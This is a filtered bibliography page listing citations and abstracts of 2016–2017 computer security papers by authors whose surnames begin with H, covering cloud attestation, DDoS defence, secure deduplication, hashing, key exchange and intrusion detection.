Visible to the public Biblio

Found 2859 results

Filters: First Letter Of Last Name is H  [Clear All Filters]
2018-01-16
Huang, C., Hou, C., He, L., Dai, H., Ding, Y..  2017.  Policy-Customized: A New Abstraction for Building Security as a Service. 2017 14th International Symposium on Pervasive Systems, Algorithms and Networks 2017 11th International Conference on Frontier of Computer Science and Technology 2017 Third International Symposium of Creative Computing (ISPAN-FCST-ISCC). :203–210.

Just as cloud customers have different performance requirements, they also have different security requirements for their computations in the cloud. Researchers have suggested a "security on demand" service model for cloud computing, where secure computing environment are dynamically provisioned to cloud customers according to their specific security needs. The availability of secure computing platforms is a necessary but not a sufficient solution to convince cloud customers to move their sensitive data and code to the cloud. Cloud customers need further assurance to convince them that the security measures are indeed deployed, and are working correctly. In this paper, we present Policy-Customized Trusted Cloud Service architecture with a new remote attestation scheme and a virtual machine migration protocol, where cloud customer can custom security policy of computing environment and validate whether the current computing environment meets the security policy in the whole life cycle of the virtual machine. To prove the availability of proposed architecture, we realize a prototype that support customer-customized security policy and a VM migration protocol that support customer-customized migration policy and validation based on open source Xen Hypervisor.

Benjamin, B., Coffman, J., Esiely-Barrera, H., Farr, K., Fichter, D., Genin, D., Glendenning, L., Hamilton, P., Harshavardhana, S., Hom, R. et al..  2017.  Data Protection in OpenStack. 2017 IEEE 10th International Conference on Cloud Computing (CLOUD). :560–567.

As cloud computing becomes increasingly pervasive, it is critical for cloud providers to support basic security controls. Although major cloud providers tout such features, relatively little is known in many cases about their design and implementation. In this paper, we describe several security features in OpenStack, a widely-used, open source cloud computing platform. Our contributions to OpenStack range from key management and storage encryption to guaranteeing the integrity of virtual machine (VM) images prior to boot. We describe the design and implementation of these features in detail and provide a security analysis that enumerates the threats that each mitigates. Our performance evaluation shows that these security features have an acceptable cost-in some cases, within the measurement error observed in an operational cloud deployment. Finally, we highlight lessons learned from our real-world development experiences from contributing these features to OpenStack as a way to encourage others to transition their research into practice.

Viet, A. N., Van, L. P., Minh, H. A. N., Xuan, H. D., Ngoc, N. P., Huu, T. N..  2017.  Mitigating HTTP GET flooding attacks in SDN using NetFPGA-based OpenFlow switch. 2017 14th International Conference on Electrical Engineering/Electronics, Computer, Telecommunications and Information Technology (ECTI-CON). :660–663.

In this paper, we propose a hardware-based defense system in Software-Defined Networking architecture to protect against the HTTP GET Flooding attacks, one of the most dangerous Distributed Denial of Service (DDoS) attacks in recent years. Our defense system utilizes per-URL counting mechanism and has been implemented on FPGA as an extension of a NetFPGA-based OpenFlow switch.

Hyun, D., Kim, J., Hong, D., Jeong, J. P..  2017.  SDN-based network security functions for effective DDoS attack mitigation. 2017 International Conference on Information and Communication Technology Convergence (ICTC). :834–839.

Distributed Denial of Service (DDoS) attack has been bringing serious security concerns on banks, finance incorporation, public institutions, and data centers. Also, the emerging wave of Internet of Things (IoT) raises new concerns on the smart devices. Software Defined Networking (SDN) and Network Functions Virtualization (NFV) have provided a new paradigm for network security. In this paper, we propose a new method to efficiently prevent DDoS attacks, based on a SDN/NFV framework. To resolve the problem that normal packets are blocked due to the inspection on suspicious packets, we developed a threshold-based method that provides a client with an efficient, fast DDoS attack mitigation. In addition, we use open source code to develop the security functions in order to implement our solution for SDN-based network security functions. The source code is based on NETCONF protocol [1] and YANG Data Model [2].

He, Z., Zhang, T., Lee, R. B..  2017.  Machine Learning Based DDoS Attack Detection from Source Side in Cloud. 2017 IEEE 4th International Conference on Cyber Security and Cloud Computing (CSCloud). :114–120.

Denial of service (DOS) attacks are a serious threat to network security. These attacks are often sourced from virtual machines in the cloud, rather than from the attacker's own machine, to achieve anonymity and higher network bandwidth. Past research focused on analyzing traffic on the destination (victim's) side with predefined thresholds. These approaches have significant disadvantages. They are only passive defenses after the attack, they cannot use the outbound statistical features of attacks, and it is hard to trace back to the attacker with these approaches. In this paper, we propose a DOS attack detection system on the source side in the cloud, based on machine learning techniques. This system leverages statistical information from both the cloud server's hypervisor and the virtual machines, to prevent network packages from being sent out to the outside network. We evaluate nine machine learning algorithms and carefully compare their performance. Our experimental results show that more than 99.7% of four kinds of DOS attacks are successfully detected. Our approach does not degrade performance and can be easily extended to broader DOS attacks.

Shin, Youngjoo, Koo, Dongyoung, Hur, Junbeom.  2017.  A Survey of Secure Data Deduplication Schemes for Cloud Storage Systems. ACM Comput. Surv.. 49:74:1–74:38.

Data deduplication has attracted many cloud service providers (CSPs) as a way to reduce storage costs. Even though the general deduplication approach has been increasingly accepted, it comes with many security and privacy problems due to the outsourced data delivery models of cloud storage. To deal with specific security and privacy issues, secure deduplication techniques have been proposed for cloud data, leading to a diverse range of solutions and trade-offs. Hence, in this article, we discuss ongoing research on secure deduplication for cloud data in consideration of the attack scenarios exploited most widely in cloud storage. On the basis of classification of deduplication system, we explore security risks and attack scenarios from both inside and outside adversaries. We then describe state-of-the-art secure deduplication techniques for each approach that deal with different security issues under specific or combined threat models, which include both cryptographic and protocol solutions. We discuss and compare each scheme in terms of security and efficiency specific to different security goals. Finally, we identify and discuss unresolved issues and further research challenges for secure deduplication in cloud storage.

Ahmad, M., Shahid, A., Qadri, M. Y., Hussain, K., Qadri, N. N..  2017.  Fingerprinting non-numeric datasets using row association and pattern generation. 2017 International Conference on Communication Technologies (ComTech). :149–155.

Being an era of fast internet-based application environment, large volumes of relational data are being outsourced for business purposes. Therefore, ownership and digital rights protection has become one of the greatest challenges and among the most critical issues. This paper presents a novel fingerprinting technique to protect ownership rights of non-numeric digital data on basis of pattern generation and row association schemes. Firstly, fingerprint sequence is formulated by using secret key and buyer's Unique ID. With the chunks of these sequences and by applying the Fibonacci series, we select some rows. The selected rows are candidates of fingerprinting. The primary key of selected row is protected using RSA encryption; after which a pattern is designed by randomly choosing the values of different attributes of datasets. The encryption of primary key leads to develop an association between original and fake pattern; creating an ease in fingerprint detection. Fingerprint detection algorithm first finds the fake rows and then extracts the fingerprint sequence from the fake attributes, hence identifying the traitor. Some most important features of the proposed approach is to overcome major weaknesses such as error tolerance, integrity and accuracy in previously proposed fingerprinting techniques. The results show that technique is efficient and robust against several malicious attacks.

2018-01-10
Ping, Haoyue, Stoyanovich, Julia, Howe, Bill.  2017.  DataSynthesizer: Privacy-Preserving Synthetic Datasets. Proceedings of the 29th International Conference on Scientific and Statistical Database Management. :42:1–42:5.
To facilitate collaboration over sensitive data, we present DataSynthesizer, a tool that takes a sensitive dataset as input and generates a structurally and statistically similar synthetic dataset with strong privacy guarantees. The data owners need not release their data, while potential collaborators can begin developing models and methods with some confidence that their results will work similarly on the real dataset. The distinguishing feature of DataSynthesizer is its usability — the data owner does not have to specify any parameters to start generating and sharing data safely and effectively. DataSynthesizer consists of three high-level modules — DataDescriber, DataGenerator and ModelInspector. The first, DataDescriber, investigates the data types, correlations and distributions of the attributes in the private dataset, and produces a data summary, adding noise to the distributions to preserve privacy. DataGenerator samples from the summary computed by DataDescriber and outputs synthetic data. ModelInspector shows an intuitive description of the data summary that was computed by DataDescriber, allowing the data owner to evaluate the accuracy of the summarization process and adjust any parameters, if desired. We describe DataSynthesizer and illustrate its use in an urban science context, where sharing sensitive, legally encumbered data between agencies and with outside collaborators is reported as the primary obstacle to data-driven governance. The code implementing all parts of this work is publicly available at https://github.com/DataResponsibly/DataSynthesizer.
He, Zaobo, Cai, Zhipeng, Sun, Yunchuan, Li, Yingshu, Cheng, Xiuzhen.  2017.  Customized Privacy Preserving for Inherent Data and Latent Data. Personal Ubiquitous Comput.. 21:43–54.
The huge amount of sensory data collected from mobile devices has offered great potentials to promote more significant services based on user data extracted from sensor readings. However, releasing user data could also seriously threaten user privacy. It is possible to directly collect sensitive information from released user data without user permissions. Furthermore, third party users can also infer sensitive information contained in released data in a latent manner by utilizing data mining techniques. In this paper, we formally define these two types of threats as inherent data privacy and latent data privacy and construct a data-sanitization strategy that can optimize the tradeoff between data utility and customized two types of privacy. The key novel idea lies that the developed strategy can combat against powerful third party users with broad knowledge about users and launching optimal inference attacks. We show that our strategy does not reduce the benefit brought by user data much, while sensitive information can still be protected. To the best of our knowledge, this is the first work that preserves both inherent data privacy and latent data privacy.
Harini, M., Gowri, K. P., Pavithra, C., Selvarani, M. P..  2017.  A novel security mechanism using hybrid cryptography algorithms. 2017 IEEE International Conference on Electrical, Instrumentation and Communication Engineering (ICEICE). :1–4.

Data security is a primary concern for every communication system. Communication becomes an essential tool for any business, education, defense services etc. It is essential to transfer data safe and secure. At present, various cryptography algorithms have been proposed and implemented. Those algorithms are classified into symmetric and asymmetric algorithms based on the number of keys used. Even though several algorithms are used for data security, they are compromise the security at the certain period. Now the idea is to combine the several secure algorithms to provide a highly secure environment for data transmission. The algorithms that are going to be combined are AES symmetric cryptographic algorithm, RSA asymmetric algorithm and MD5 hashing algorithm. With these three algorithms, we can ensure three cryptography primitives confidentiality, authentication and integrity of data.

Higuchi, K., Yoshida, M., Tsuji, T., Miyamoto, N..  2017.  Correctness of the routing algorithm for distributed key-value store based on order preserving linear hashing and skip graph. 2017 18th IEEE/ACIS International Conference on Software Engineering, Artificial Intelligence, Networking and Parallel/Distributed Computing (SNPD). :459–464.

In this paper, the correctness of the routing algorithm for the distributed key-value store based on order preserving linear hashing and Skip Graph is proved. In this system, data are divided by linear hashing and Skip Graph is used for overlay network. The routing table of this system is very uniform. Then, short detours can exist in the route of forwarding. By using these detours, the number of hops for the query forwarding is reduced.

Alwen, Joel, Blocki, Jeremiah, Harsha, Ben.  2017.  Practical Graphs for Optimal Side-Channel Resistant Memory-Hard Functions. Proceedings of the 2017 ACM SIGSAC Conference on Computer and Communications Security. :1001–1017.
A memory-hard function (MHF) ƒn with parameter n can be computed in sequential time and space n. Simultaneously, a high amortized parallel area-time complexity (aAT) is incurred per evaluation. In practice, MHFs are used to limit the rate at which an adversary (using a custom computational device) can evaluate a security sensitive function that still occasionally needs to be evaluated by honest users (using an off-the-shelf general purpose device). The most prevalent examples of such sensitive functions are Key Derivation Functions (KDFs) and password hashing algorithms where rate limits help mitigate off-line dictionary attacks. As the honest users' inputs to these functions are often (low-entropy) passwords special attention is given to a class of side-channel resistant MHFs called iMHFs. Essentially all iMHFs can be viewed as some mode of operation (making n calls to some round function) given by a directed acyclic graph (DAG) with very low indegree. Recently, a combinatorial property of a DAG has been identified (called "depth-robustness") which results in good provable security for an iMHF based on that DAG. Depth-robust DAGs have also proven useful in other cryptographic applications. Unfortunately, up till now, all known very depth-robust DAGs are impractically complicated and little is known about their exact (i.e. non-asymptotic) depth-robustness both in theory and in practice. In this work we build and analyze (both formally and empirically) several exceedingly simple and efficient to navigate practical DAGs for use in iMHFs and other applications. For each DAG we: Prove that their depth-robustness is asymptotically maximal. Prove bounds of at least 3 orders of magnitude better on their exact depth-robustness compared to known bounds for other practical iMHF. Implement and empirically evaluate their depth-robustness and aAT against a variety of state-of-the art (and several new) depth-reduction and low aAT attacks. We find that, against all attacks, the new DAGs perform significantly better in practice than Argon2i, the most widely deployed iMHF in practice. Along the way we also improve the best known empirical attacks on the aAT of Argon2i by implementing and testing several heuristic versions of a (hitherto purely theoretical) depth-reduction attack. Finally, we demonstrate practicality of our constructions by modifying the Argon2i code base to use one of the new high aAT DAGs. Experimental benchmarks on a standard off-the-shelf CPU show that the new modifications do not adversely affect the impressive throughput of Argon2i (despite seemingly enjoying significantly higher aAT).
Bai, Jiale, Ni, Bingbing, Wang, Minsi, Shen, Yang, Lai, Hanjiang, Zhang, Chongyang, Mei, Lin, Hu, Chuanping, Yao, Chen.  2017.  Deep Progressive Hashing for Image Retrieval. Proceedings of the 2017 ACM on Multimedia Conference. :208–216.

This paper proposes a novel recursive hashing scheme, in contrast to conventional "one-off" based hashing algorithms. Inspired by human's "nonsalient-to-salient" perception path, the proposed hashing scheme generates a series of binary codes based on progressively expanded salient regions. Built on a recurrent deep network, i.e., LSTM structure, the binary codes generated from later output nodes naturally inherit information aggregated from previously codes while explore novel information from the extended salient region, and therefore it possesses good scalability property. The proposed deep hashing network is trained via minimizing a triplet ranking loss, which is end-to-end trainable. Extensive experimental results on several image retrieval benchmarks demonstrate good performance gain over state-of-the-art image retrieval methods and its scalability property.

Hu, Qinghao, Wu, Jiaxiang, Cheng, Jian, Wu, Lifang, Lu, Hanqing.  2017.  Pseudo Label Based Unsupervised Deep Discriminative Hashing for Image Retrieval. Proceedings of the 2017 ACM on Multimedia Conference. :1584–1590.

Hashing methods play an important role in large scale image retrieval. Traditional hashing methods use hand-crafted features to learn hash functions, which can not capture the high level semantic information. Deep hashing algorithms use deep neural networks to learn feature representation and hash functions simultaneously. Most of these algorithms exploit supervised information to train the deep network. However, supervised information is expensive to obtain. In this paper, we propose a pseudo label based unsupervised deep discriminative hashing algorithm. First, we cluster images via K-means and the cluster labels are treated as pseudo labels. Then we train a deep hashing network with pseudo labels by minimizing the classification loss and quantization loss. Experiments on two datasets demonstrate that our unsupervised deep discriminative hashing method outperforms the state-of-art unsupervised hashing methods.

Li, Zhijun, He, Tian.  2017.  WEBee: Physical-Layer Cross-Technology Communication via Emulation. Proceedings of the 23rd Annual International Conference on Mobile Computing and Networking. :2–14.
Recent advances in Cross-Technology Communication (CTC) have improved efficient coexistence and cooperation among heterogeneous wireless devices (e.g., WiFi, ZigBee, and Bluetooth) operating in the same ISM band. However, until now the effectiveness of existing CTCs, which rely on packet-level modulation, is limited due to their low throughput (e.g., tens of bps). Our work, named WEBee, opens a promising direction for high-throughput CTC via physical-level emulation. WEBee uses a high-speed wireless radio (e.g., WiFi OFDM) to emulate the desired signals of a low-speed radio (e.g., ZigBee). Our unique emulation technique manipulates only the payload of WiFi packets, requiring neither hardware nor firmware changes in commodity technologies – a feature allowing zero-cost fast deployment on existing WiFi infrastructure. We designed and implemented WEBee with commodity devices (Atheros AR2425 WiFi card and MicaZ CC2420) and the USRP-N210 platform (for PHY layer evaluation). Our comprehensive evaluation reveals that WEBee can achieve a more than 99% reliable parallel CTC between WiFi and ZigBee with 126 Kbps in noisy environments, a throughput about 16,000x faster than current state-of-the-art CTCs.
Chen, Chen, Tong, Hanghang, Xie, Lei, Ying, Lei, He, Qing.  2017.  Cross-Dependency Inference in Multi-Layered Networks: A Collaborative Filtering Perspective. ACM Trans. Knowl. Discov. Data. 11:42:1–42:26.
The increasingly connected world has catalyzed the fusion of networks from different domains, which facilitates the emergence of a new network model—multi-layered networks. Examples of such kind of network systems include critical infrastructure networks, biological systems, organization-level collaborations, cross-platform e-commerce, and so forth. One crucial structure that distances multi-layered network from other network models is its cross-layer dependency, which describes the associations between the nodes from different layers. Needless to say, the cross-layer dependency in the network plays an essential role in many data mining applications like system robustness analysis and complex network control. However, it remains a daunting task to know the exact dependency relationships due to noise, limited accessibility, and so forth. In this article, we tackle the cross-layer dependency inference problem by modeling it as a collective collaborative filtering problem. Based on this idea, we propose an effective algorithm F\textbackslashtextlessscp;\textbackslashtextgreaterascinate\textbackslashtextless/scp;\textbackslashtextgreater that can reveal unobserved dependencies with linear complexity. Moreover, we derive F\textbackslashtextlessscp;\textbackslashtextgreaterascinate\textbackslashtextless/scp;\textbackslashtextgreater-ZERO, an online variant of F\textbackslashtextlessscp;\textbackslashtextgreaterascinate\textbackslashtextless/scp;\textbackslashtextgreater that can respond to a newly added node timely by checking its neighborhood dependencies. We perform extensive evaluations on real datasets to substantiate the superiority of our proposed approaches.
Bronte, Robert, Shahriar, Hossain, Haddad, Hisham M..  2016.  A Signature-Based Intrusion Detection System for Web Applications Based on Genetic Algorithm. Proceedings of the 9th International Conference on Security of Information and Networks. :32–39.
Web application attacks are an extreme threat to the world's information technology infrastructure. A web application is generally defined as a client-server software application where the client uses a user interface within a web browser. Most users are familiar with web application attacks. For instance, a user may have received a link in an email that led the user to a malicious website. The most widely accepted solution to this threat is to deploy an Intrusion Detection System (IDS). Such a system currently relies on signatures of the predefined set of events matching with attacks. Issues still arise as all possible attack signatures may not be defined before deploying an IDS. Attack events may not fit with the pre-defined signatures. Thus, there is a need to detect new types of attacks with a mutated signature based detection approach. Most traditional literature works describe signature based IDSs for application layer attacks, but several works mention that not all attacks can be detected. It is well known that many security threats can be related to software or application development and design or implementation flaws. Given that fact, this work expands a new method for signature based web application layer attack detection. We apply a genetic algorithm to analyze web server and database logs and the log entries. The work contributes to the development of a mutated signature detection framework. The initial results show that the suggested approach can detect specific application layer attacks such as Cross-Site Scripting, SQL Injection and Remote File Inclusion attacks.
Zhang, Yuexin, Xiang, Yang, Huang, Xinyi.  2016.  Password-Authenticated Group Key Exchange: A Cross-Layer Design. ACM Trans. Internet Technol.. 16:24:1–24:20.
Two-party password-authenticated key exchange (2PAKE) protocols provide a natural mechanism for secret key establishment in distributed applications, and they have been extensively studied in past decades. However, only a few efforts have been made so far to design password-authenticated group key exchange (GPAKE) protocols. In a 2PAKE or GPAKE protocol, it is assumed that short passwords are preshared among users. This assumption, however, would be impractical in certain applications. Motivated by this observation, this article presents a GPAKE protocol without the password sharing assumption. To obtain the passwords, wireless devices, such as smart phones, tablets, and laptops, are used to extract short secrets at the physical layer. Using the extracted secrets, users in our protocol can establish a group key at higher layers with light computation consumptions. Thus, our GPAKE protocol is a cross-layer design. Additionally, our protocol is a compiler, that is, our protocol can transform any provably secure 2PAKE protocol into a GPAKE protocol with only one more round of communications. Besides, the proposed protocol is proved secure in the standard model.
Graur, O., Islam, N., Henkel, W..  2016.  Quantization for Physical Layer Security. 2016 IEEE Globecom Workshops (GC Wkshps). :1–7.

We propose a multi-level CSI quantization and key reconciliation scheme for physical layer security. The noisy wireless channel estimates obtained by the users first run through a transformation, prior to the quantization step. This enables the definition of guard bands around the quantization boundaries, tailored for a specific efficiency and not compromising the uniformity required at the output of the quantizer. Our construction results in an better key disagreement and initial key generation rate trade-off when compared to other level-crossing quantization methods.

Chen, W., Hong, L., Shetty, S., Lo, D., Cooper, R..  2016.  Cross-Layered Security Approach with Compromised Nodes Detection in Cooperative Sensor Networks. 2016 IEEE International Parallel and Distributed Processing Symposium Workshops (IPDPSW). :499–508.

Cooperative MIMO communication is a promising technology which enables realistic solution for improving communication performance with MIMO technique in wireless networks that are composed of size and cost constrained devices. However, the security problems inherent to cooperative communication also arise. Cryptography can ensure the confidentiality in the communication and routing between authorized participants, but it usually cannot prevent the attacks from compromised nodes which may corrupt communications by sending garbled signals. In this paper, we propose a cross-layered approach to enhance the security in query-based cooperative MIMO sensor networks. The approach combines efficient cryptographic technique implemented in upper layer with a novel information theory based compromised nodes detection algorithm in physical layer. In the detection algorithm, a cluster of K cooperative nodes are used to identify up to K - 1 active compromised nodes. When the compromised nodes are detected, the key revocation is performed to isolate the compromised nodes and reconfigure the cooperative MIMO sensor network. During this process, beamforming is used to avoid the information leaking. The proposed security scheme can be easily modified and applied to cognitive radio networks. Simulation results show that the proposed algorithm for compromised nodes detection is effective and efficient, and the accuracy of received information is significantly improved.

Hamamreh, J. M., Yusuf, M., Baykas, T., Arslan, H..  2016.  Cross MAC/PHY layer security design using ARQ with MRC and adaptive modulation. 2016 IEEE Wireless Communications and Networking Conference. :1–7.

In this work, Automatic-Repeat-Request (ARQ) and Maximal Ratio Combination (MRC), have been jointly exploited to enhance the confidentiality of wireless services requested by a legitimate user (Bob) against an eavesdropper (Eve). The obtained security performance is analyzed using Packet Error Rate (PER), where the exact PER gap between Bob and Eve is determined. PER is proposed as a new practical security metric in cross layers (Physical/MAC) security design since it reflects the influence of upper layers mechanisms, and it can be linked with Quality of Service (QoS) requirements for various digital services such as voice and video. Exact PER formulas for both Eve and Bob in i.i.d Rayleigh fading channel are derived. The simulation and theoretical results show that the employment of ARQ mechanism and MRC on a signal level basis before demodulation can significantly enhance data security for certain services at specific SNRs. However, to increase and ensure the security of a specific service at any SNR, adaptive modulation is proposed to be used along with the aforementioned scheme. Analytical and simulation studies demonstrate orders of magnitude difference in PER performance between eavesdroppers and intended receivers.

Procter, Sam, Vasserman, Eugene Y., Hatcliff, John.  2017.  SAFE and Secure: Deeply Integrating Security in a New Hazard Analysis. Proceedings of the 12th International Conference on Availability, Reliability and Security. :66:1–66:10.

Safety-critical system engineering and traditional safety analyses have for decades been focused on problems caused by natural or accidental phenomena. Security analyses, on the other hand, focus on preventing intentional, malicious acts that reduce system availability, degrade user privacy, or enable unauthorized access. In the context of safety-critical systems, safety and security are intertwined, e.g., injecting malicious control commands may lead to system actuation that causes harm. Despite this intertwining, safety and security concerns have traditionally been designed and analyzed independently of one another, and examined in very different ways. In this work we examine a new hazard analysis technique—Systematic Analysis of Faults and Errors (SAFE)—and its deep integration of safety and security concerns. This is achieved by explicitly incorporating a semantic framework of error "effects" that unifies an adversary model long used in security contexts with a fault/error categorization that aligns with previous approaches to hazard analysis. This categorization enables analysts to separate the immediate, component-level effects of errors from their cause or precise deviation from specification. This paper details SAFE's integrated handling of safety and security through a) a methodology grounded in—and adaptable to—different approaches from the literature, b) explicit documentation of system assumptions which are implicit in other analyses, and c) increasing the tractability of analyzing modern, complex, component-based software-driven systems. We then discuss how SAFE's approach supports the long-term goals of of increased compositionality and formalization of safety/security analysis. 

Hamasaki, J., Iwamura, K..  2017.  Geometric group key-sharing scheme using euclidean distance. 2017 14th IEEE Annual Consumer Communications Networking Conference (CCNC). :1004–1005.

A wireless sensor network (WSN) is composed of sensor nodes and a base station. In WSNs, constructing an efficient key-sharing scheme to ensure a secure communication is important. In this paper, we propose a new key-sharing scheme for groups, which shares a group key in a single broadcast without being dependent on the number of nodes. This scheme is based on geometric characteristics and has information-theoretic security in the analysis of transmitted data. We compared our scheme with conventional schemes in terms of communication traffic, computational complexity, flexibility, and security, and the results showed that our scheme is suitable for an Internet-of-Things (IoT) network.

Proy, Julien, Heydemann, Karine, Berzati, Alexandre, Cohen, Albert.  2017.  Compiler-Assisted Loop Hardening Against Fault Attacks. ACM Trans. Archit. Code Optim.. 14:36:1–36:25.
Secure elements widely used in smartphones, digital consumer electronics, and payment systems are subject to fault attacks. To thwart such attacks, software protections are manually inserted requiring experts and time. The explosion of the Internet of Things (IoT) in home, business, and public spaces motivates the hardening of a wider class of applications and the need to offer security solutions to non-experts. This article addresses the automated protection of loops at compilation time, covering the widest range of control- and data-flow patterns, in both shape and complexity. The security property we consider is that a sensitive loop must always perform the expected number of iterations; otherwise, an attack must be reported. We propose a generic compile-time loop hardening scheme based on the duplication of termination conditions and of the computations involved in the evaluation of such conditions. We also investigate how to preserve the security property along the compilation flow while enabling aggressive optimizations. We implemented this algorithm in LLVM 4.0 at the Intermediate Representation (IR) level in the backend. On average, the compiler automatically hardens 95% of the sensitive loops of typical security benchmarks, and 98% of these loops are shown to be robust to simulated faults. Performance and code size overhead remain quite affordable, at 12.5% and 14%, respectively.
Hosseini, S., Swash, M. R., Sadka, A..  2017.  Immersive 360 Holoscopic 3D system design. 2017 4th International Conference on Signal Processing and Integrated Networks (SPIN). :325–329.
3D imaging has been a hot research topic recently due to a high demand from various applications of security, health, autonomous vehicle and robotics. Yet Stereoscopic 3D imaging is limited due to its principles which mimics the human eye technique thus the camera separation baseline defines amount of 3D depth can be captured. Holoscopic 3D (H3D) Imaging is based on the “Fly's eye” technique that uses coherent replication of light to record a spatial image of a real scene using a microlens array (MLA) which gives the complete 3D parallax. H3D Imaging has been considered a promising 3D imaging technique which pursues the simple form of 3D acquisition using a single aperture camera therefore it is the most suited for scalable digitization, security and autonomous applications. This paper proposes 360-degree holoscopic 3D imaging system design for immersive 3D acquisition and stitching.